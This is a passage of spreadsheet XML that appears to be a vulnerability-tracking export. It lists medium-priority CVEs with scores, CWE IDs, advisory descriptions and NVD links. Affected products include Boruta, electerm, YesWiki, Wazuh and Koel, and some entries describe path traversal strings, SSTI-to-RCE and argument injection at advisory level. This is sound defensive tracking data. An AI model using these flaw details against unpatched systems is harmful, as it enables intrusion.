      <c r="M3114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48495</t>
        </is>
      </c>
    </row>
    <row r="3115">
      <c r="A3115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49249</t>
        </is>
      </c>
      <c r="C3115" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3115" s="5" t="inlineStr"/>
      <c r="F3115" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3115" s="5" t="inlineStr"/>
      <c r="H3115" s="5" t="inlineStr"/>
      <c r="I3115" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3115" s="5" t="inlineStr"/>
      <c r="K3115" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L3115" s="5" t="inlineStr">
        <is>
          <t>Boruta is a standalone authorization server that aims to implement OAuth 2.0 and Openid Connect up to decentralized identity specifications. Prior to version 0.10.0, BorutaIdentityWeb.UserSettingsController.update/2 atomizes every key of the user-supplied request body via String.to_atom/1 before any validation. Because String.to_atom interns atoms permanently in the BEAM atom table (default cap 1,048,576 atoms; ERL_MAX_ATOMS), any authenticated end user can send PUT /users/settings with a user[&lt;fresh-key&gt;]=... body containing fresh keys per request and exhaust the global VM atom table. Once the table is full, the BEAM aborts with no more index entries in atom_tab and the entire OIDC server (auth, admin, gateway apps in the umbrella) crashes. The route is protected only by require_authenticated_user and a per-IP rate limit of 10 requests/second; a logged-in end user can hit it. The keys are atomized unconditionally before the downstream Accounts.update_user/6 call, so even failing updates contribute to exhaustion. This issue has been patched in version 0.10.0.</t>
        </is>
      </c>
      <c r="M3115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49249</t>
        </is>
      </c>
    </row>
    <row r="3116">
      <c r="A3116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49253</t>
        </is>
      </c>
      <c r="C3116" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3116" s="5" t="inlineStr"/>
      <c r="F3116" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3116" s="5" t="inlineStr"/>
      <c r="H3116" s="5" t="inlineStr"/>
      <c r="I3116" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3116" s="5" t="inlineStr"/>
      <c r="K3116" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3116" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.11.11, electerm uses remote-supplied filenames directly with path.join() while receiving Zmodem and Trzsz transfers. In src/app/server/zmodem.js, prepareReceiveFile() joins the filename to the user-selected save path, and in src/app/server/trzsz.js, getUniqueFilePath(), the openSaveFile() callback, and the savedFilePaths mapping construct destinations without sanitization. A malicious SSH server or remote shell can provide a filename containing traversal components such as ../escaped.txt or ../../.bashrc. When the victim accepts the transfer and selects a download directory, electerm can write outside that directory and overwrite files accessible to the desktop user, potentially changing sensitive configuration or impairing availability. This issue is fixed in version 3.11.11.</t>
        </is>
      </c>
      <c r="M3116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49253</t>
        </is>
      </c>
    </row>
    <row r="3117">
      <c r="A3117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49315</t>
        </is>
      </c>
      <c r="C3117" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3117" s="5" t="inlineStr"/>
      <c r="F3117" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3117" s="5" t="inlineStr"/>
      <c r="H3117" s="5" t="inlineStr"/>
      <c r="I3117" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3117" s="5" t="inlineStr"/>
      <c r="K3117" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="L3117" s="5" t="inlineStr">
        <is>
          <t>DoS vulnerability in the input device module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="M3117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49315</t>
        </is>
      </c>
    </row>
    <row r="3118">
      <c r="A3118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50165</t>
        </is>
      </c>
      <c r="C3118" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3118" s="5" t="inlineStr"/>
      <c r="F3118" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3118" s="5" t="inlineStr"/>
      <c r="H3118" s="5" t="inlineStr"/>
      <c r="I3118" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3118" s="5" t="inlineStr"/>
      <c r="K3118" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L3118" s="5" t="inlineStr">
        <is>
          <t>alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. An Improper Access Control issue in versions prior to 2.0-M5-2605 allows an organization owner to read system-level configuration secrets through organization/event scoped "single configuration" endpoints. The affected endpoints require organization or event ownership, but they accept an arbitrary configuration key and then return the first matching value from a lookup that includes system-level configuration. As a result, an organization owner can retrieve secrets intended to be administrator-only, including the system API key when it is configured. Version 2.0-M5-2605 fixes the issue.</t>
        </is>
      </c>
      <c r="M3118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50165</t>
        </is>
      </c>
    </row>
    <row r="3119">
      <c r="A3119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52762</t>
        </is>
      </c>
      <c r="C3119" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3119" s="5" t="inlineStr"/>
      <c r="F3119" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3119" s="5" t="inlineStr"/>
      <c r="H3119" s="5" t="inlineStr"/>
      <c r="I3119" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3119" s="5" t="inlineStr"/>
      <c r="K3119" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3119" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki Bazar contains a stored Server-Side Template Injection (SSTI) vulnerability in the semantic template feature that can be escalated to confirmed Remote Code Execution (RCE). An authenticated administrator can place arbitrary Twig expressions into the Semantic template (Twig) field (bn_sem_template), and that content is later executed server-side when public semantic endpoints are requested. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M3119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52762</t>
        </is>
      </c>
    </row>
    <row r="3120">
      <c r="A3120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53532</t>
        </is>
      </c>
      <c r="C3120" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3120" s="5" t="inlineStr"/>
      <c r="F3120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3120" s="5" t="inlineStr"/>
      <c r="H3120" s="5" t="inlineStr"/>
      <c r="I3120" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3120" s="5" t="inlineStr"/>
      <c r="K3120" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L3120" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions 3.4.0 through 3.4.12, a crafted HTJ2K-compressed EXR file causes an unconditional process abort in any application that calls exr_start_read() on untrusted input, resulting in denial of service. The crash is triggered by a QCD marker whose lower five bits are zero, which OpenEXR passes into the vendored OpenJPH library while constructing the codestream and evaluating its quantization delta parameters. OpenJPH uses an assertion rather than a recoverable error to validate those bits, so any invalid value calls abort() directly and cannot be intercepted by surrounding error handling, a problem compounded by OpenEXR wrapping only its internal HT header parser in error handling while leaving the later codestream read and construction calls unprotected. This issue has been resolved in version 3.4.13.</t>
        </is>
      </c>
      <c r="M3120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53532</t>
        </is>
      </c>
    </row>
    <row r="3121">
      <c r="A3121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53603</t>
        </is>
      </c>
      <c r="C3121" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3121" s="5" t="inlineStr"/>
      <c r="F3121" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3121" s="5" t="inlineStr"/>
      <c r="H3121" s="5" t="inlineStr"/>
      <c r="I3121" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3121" s="5" t="inlineStr"/>
      <c r="K3121" s="5" t="inlineStr">
        <is>
          <t>CWE-312, CWE-522</t>
        </is>
      </c>
      <c r="L3121" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.3.8, Operator session tokens are stored in plaintext in the operator_sessions table (the token column is the PRIMARY KEY). The session token is a 32-byte random hex value sent directly in a cookie and valid for 24 hours. Anyone who can read the database (backup, snapshot, file copy, or SQL-level disclosure) obtains every active session token and can hijack operator sessions directly, with no further authentication. This issue has been patched in version 0.3.8.</t>
        </is>
      </c>
      <c r="M3121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53603</t>
        </is>
      </c>
    </row>
    <row r="3122">
      <c r="A3122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53604</t>
        </is>
      </c>
      <c r="C3122" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3122" s="5" t="inlineStr"/>
      <c r="F3122" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3122" s="5" t="inlineStr"/>
      <c r="H3122" s="5" t="inlineStr"/>
      <c r="I3122" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3122" s="5" t="inlineStr"/>
      <c r="K3122" s="5" t="inlineStr">
        <is>
          <t>CWE-212, CWE-316</t>
        </is>
      </c>
      <c r="L3122" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.3.8, the web handler renderMobileBundle passes the real *pki.CAResolver directly into mobilebundle.Build. Inside Build, resolver.LoadByID decrypts the CA's ed25519 private key into a *pki.CAManager, but Build never calls CAManager.Wipe() on any return path. As a result, when a mobile-bundle request goes through the web UI and Build returns — especially on error (missing network, invalid prefix, DB error, signing failure) — the plaintext CA private key remains on the Go heap, unwiped, until garbage collection. An attacker able to read process memory (core dump, swap, memory-scraping) can recover the CA signing key, which would allow minting arbitrary host certificates for the mesh. The API handler already does this correctly: it loads the CAManager, defer caMgr.Wipe(), and wraps it in caManagerResolver. Only the web path is affected. This issue has been patched in version 0.3.8.</t>
        </is>
      </c>
      <c r="M3122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53604</t>
        </is>
      </c>
    </row>
    <row r="3123">
      <c r="A3123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53704</t>
        </is>
      </c>
      <c r="C3123" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3123" s="5" t="inlineStr"/>
      <c r="F3123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3123" s="5" t="inlineStr"/>
      <c r="H3123" s="5" t="inlineStr"/>
      <c r="I3123" s="5" t="inlineStr">
        <is>
          <t>2026-06-15</t>
        </is>
      </c>
      <c r="J3123" s="5" t="inlineStr"/>
      <c r="K3123" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3123" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GStreamer's RealMedia demuxer in the gst-plugins-ugly package. When processing a RealMedia file containing a specially crafted FILEINFO metadata section, the demuxer parses variable-name and variable-value pairs using re_skip_pascal_string() without validating that offsets remain within the mapped buffer. Additionally, the element count controlling the parsing loop is read from attacker-controlled data without validation, which can cause an infinite loop. A crafted RealMedia file can cause the application to crash, hang, or potentially read limited adjacent memory contents.</t>
        </is>
      </c>
      <c r="M3123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53704</t>
        </is>
      </c>
    </row>
    <row r="3124">
      <c r="A3124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53728</t>
        </is>
      </c>
      <c r="C3124" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3124" s="5" t="inlineStr"/>
      <c r="F3124" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3124" s="5" t="inlineStr"/>
      <c r="H3124" s="5" t="inlineStr"/>
      <c r="I3124" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3124" s="5" t="inlineStr"/>
      <c r="K3124" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-601</t>
        </is>
      </c>
      <c r="L3124" s="5" t="inlineStr">
        <is>
          <t>Medplum is a developer platform that enables development of healthcare apps. Prior to version 5.1.6, the external identity provider callback at GET /auth/external accepts attacker-controlled redirect URIs that only need to start with a registered client redirect URI, rather than matching exactly. After a successful external IdP login, the server appends Medplum login and code values to that attacker-supplied URL and issues a redirect. Because the external login request state is serialized as raw JSON and later trusted by the callback, an attacker who can tamper with state.redirectUri can cause Medplum to redirect authorization artifacts to an attacker-controlled endpoint. When the registered redirect URI is a bare origin or another prefix that can be extended into a different hostname, this becomes a cross-origin authorization code leak. This issue has been patched in version 5.1.6.</t>
        </is>
      </c>
      <c r="M3124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53728</t>
        </is>
      </c>
    </row>
    <row r="3125">
      <c r="A3125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53792</t>
        </is>
      </c>
      <c r="C3125" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3125" s="5" t="inlineStr"/>
      <c r="F3125" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3125" s="5" t="inlineStr"/>
      <c r="H3125" s="5" t="inlineStr"/>
      <c r="I3125" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3125" s="5" t="inlineStr"/>
      <c r="K3125" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="L3125" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains an out-of-bounds read vulnerability in the sender-side block matching logic that allows a malicious receiver to trigger memory access before the start of an allocated buffer by sending a crafted checksum block with a length of zero. Attackers can send a specially crafted checksum set containing a zero-length block to cause a negative offset calculation during delta computation, resulting in an out-of-bounds read of file data buffer memory on the sender side.</t>
        </is>
      </c>
      <c r="M3125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53792</t>
        </is>
      </c>
    </row>
    <row r="3126">
      <c r="A3126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54085</t>
        </is>
      </c>
      <c r="C3126" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3126" s="5" t="inlineStr"/>
      <c r="F3126" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3126" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3126" s="5" t="inlineStr"/>
      <c r="I3126" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3126" s="5" t="inlineStr"/>
      <c r="K3126" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3126" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. In versions 4.2.0 through 4.14.6, multiple active response scripts pass attacker-influenced alert fields to privileged system commands without validating their format, allowing argument injection into tools that run as root. Five of the eight scripts that handle the srcip field, route-null.c, netsh.c, pf.c, npf.c, and ipfw.c, omit the get_ip_version() check that rejects non-IP input, and disable-account.c passes the dstuser field to passwd/chuser with only a comparison against "root". An attacker who can inject crafted log events, for example via syslog, can supply srcip or dstuser values that, when an active response rule triggers, are passed unvalidated to firewall and account-management commands such as pfctl, npfctl, ipfw, route, netsh, and passwd. This enables injecting additional command arguments, and on Windows the unquoted CreateProcess command-line concatenation in wpopenv() lets a srcip containing spaces add further arguments, while disable-account.c can be abused to lock arbitrary system accounts. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M3126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54085</t>
        </is>
      </c>
    </row>
    <row r="3127">
      <c r="A3127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54356</t>
        </is>
      </c>
      <c r="C3127" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3127" s="5" t="inlineStr"/>
      <c r="F3127" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3127" s="5" t="inlineStr"/>
      <c r="H3127" s="5" t="inlineStr"/>
      <c r="I3127" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3127" s="5" t="inlineStr"/>
      <c r="K3127" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3127" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.41.3, POST /api/attachments/:datasourceId/url in packages/server/src/api/routes/static.ts and packages/server/src/api/controllers/static/index.ts allows an authenticated published-app user with the BASIC role to supply attacker-controlled bucket and key values and obtain signedUrl and publicUrl values backed by stored S3 datasource credentials. This issue is fixed in version 3.41.3.</t>
        </is>
      </c>
      <c r="M3127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54356</t>
        </is>
      </c>
    </row>
    <row r="3128">
      <c r="A3128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54491</t>
        </is>
      </c>
      <c r="C3128" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3128" s="5" t="inlineStr"/>
      <c r="F3128" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3128" s="5" t="inlineStr"/>
      <c r="H3128" s="5" t="inlineStr"/>
      <c r="I3128" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3128" s="5" t="inlineStr"/>
      <c r="K3128" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3128" s="5" t="inlineStr">
        <is>
          <t>Koel is a free, open-source music streaming solution. Prior to 9.7.1, outbound podcast and radio fetch paths perform a point-in-time App\Helpers\Network::isPublicHost() or isSafeUrl() check without pinning the validated address, and most paths lack redirect-hop validation and do not revalidate every redirect target. PhanAn\Poddle\Poddle::fromUrl(), PodcastService::getStreamableUrl(), PodcastService::isPodcastObsolete(), App\Rules\HasAudioContentType, and App\Rules\SafeUrl can therefore follow an attacker-controlled redirect to an internal address or connect after DNS rebinding changes a public resolution to a private one. These paths are reachable through podcast and radio APIs, including createPodcastChannel, createInternetRadioStation, refreshPodcasts, apiResource podcasts, and radio/stations, allowing an authenticated user to request internal services or cloud metadata and potentially receive parsed or streamed response content. This issue is fixed in version 9.7.1.</t>
        </is>
      </c>
      <c r="M3128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54491</t>
        </is>
      </c>
    </row>
    <row r="3129">
      <c r="A3129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54715</t>
        </is>
      </c>
      <c r="C3129" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3129" s="5" t="inlineStr"/>
      <c r="F3129" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3129" s="5" t="inlineStr"/>
      <c r="H3129" s="5" t="inlineStr"/>
      <c r="I3129" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3129" s="5" t="inlineStr"/>
      <c r="K3129" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L3129" s="5" t="inlineStr">
        <is>
          <t>GoAccess is a real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems or through the browser. In version 1.10.2, parse_browser assumes the matched browser token begins with Opera and moves a trailing version substring to match plus five, allowing a crafted User-Agent in a processed access log to write one to four attacker-influenced bytes beyond the heap allocation and corrupt or crash GoAccess. This issue is fixed in version 1.11.</t>
        </is>
      </c>
      <c r="M3129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54715</t>
        </is>
      </c>
    </row>
    <row r="3130">
      <c r="A3130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55066</t>
        </is>
      </c>
      <c r="C3130" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3130" s="5" t="inlineStr"/>
      <c r="F3130" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3130" s="5" t="inlineStr"/>
      <c r="H3130" s="5" t="inlineStr"/>
      <c r="I3130" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3130" s="5" t="inlineStr"/>
      <c r="K3130" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3130" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. Prior to 2.4.0, POST /api/v1/projects/{project}/views/{view}/buckets/{bucket}/tasks accepts a body supplied task_id but TaskBucket.CanUpdate in pkg/models/kanban_task_bucket.go authorizes only the project, view, and bucket from the URL. updateTaskBucket then calls Task.ReadOne without a separate task permission check, returns the victim task contents, and can update the task done state when the attacker chooses a done bucket. Because task identifiers are global sequential values, an authenticated user can enumerate cross-tenant tasks and modify their completion metadata through both the v1 and v2 routes that share this model. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="M3130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55066</t>
        </is>
      </c>
    </row>
    <row r="3131">
      <c r="A3131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55502</t>
        </is>
      </c>
      <c r="C3131" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3131" s="5" t="inlineStr"/>
      <c r="F3131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3131" s="5" t="inlineStr"/>
      <c r="H3131" s="5" t="inlineStr"/>
      <c r="I3131" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3131" s="5" t="inlineStr"/>
      <c r="K3131" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3131" s="5" t="inlineStr">
        <is>
          <t>Cloudreve is a self-hosted file management and sharing system. Prior to 4.17.0, POST /api/v4/admin/policy/oauth/signin requires only Admin.Read even though GetOauthRedirectService persists caller-supplied OneDrive secret and app_id values, allowing an OAuth token without Admin.Write to modify storage policy credentials. The route is inside the admin group that requires Admin.Read, but it does not add the local Admin.Write guard used by sibling policy mutation routes. Its handler persists attacker-supplied secret and app_id values into the selected OneDrive storage policy before returning an OAuth URL. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M3131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55502</t>
        </is>
      </c>
    </row>
    <row r="3132">
      <c r="A3132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55520</t>
        </is>
      </c>
      <c r="C3132" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3132" s="5" t="inlineStr"/>
      <c r="F3132" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3132" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3132" s="5" t="inlineStr"/>
      <c r="I3132" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3132" s="5" t="inlineStr"/>
      <c r="K3132" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L3132" s="5" t="inlineStr">
        <is>
          <t>Protego is a pure-Python robots.txt parser with support for modern conventions. Prior to 0.6.2, protego._urlpattern._URLPattern._prepare_pattern_for_regex translates every asterisk in an Allow or Disallow directive into a lazy regular-expression wildcard, so a directive containing many asterisks creates exponential backtracking. After protego.Protego.parse processes a crafted robots.txt file, protego.Protego.can_fetch can spend an attacker-controlled period matching a near-miss URL and deny service to the crawler. The vulnerable path is src/protego/_urlpattern.py in the _URLPattern match logic. This issue is fixed in version 0.6.2.</t>
        </is>
      </c>
      <c r="M3132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55520</t>
        </is>
      </c>
    </row>
    <row r="3133">
      <c r="A3133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55527</t>
        </is>
      </c>
      <c r="C3133" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3133" s="5" t="inlineStr"/>
      <c r="F3133" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3133" s="5" t="inlineStr"/>
      <c r="H3133" s="5" t="inlineStr"/>
      <c r="I3133" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3133" s="5" t="inlineStr"/>
      <c r="K3133" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L3133" s="5" t="inlineStr">
        <is>
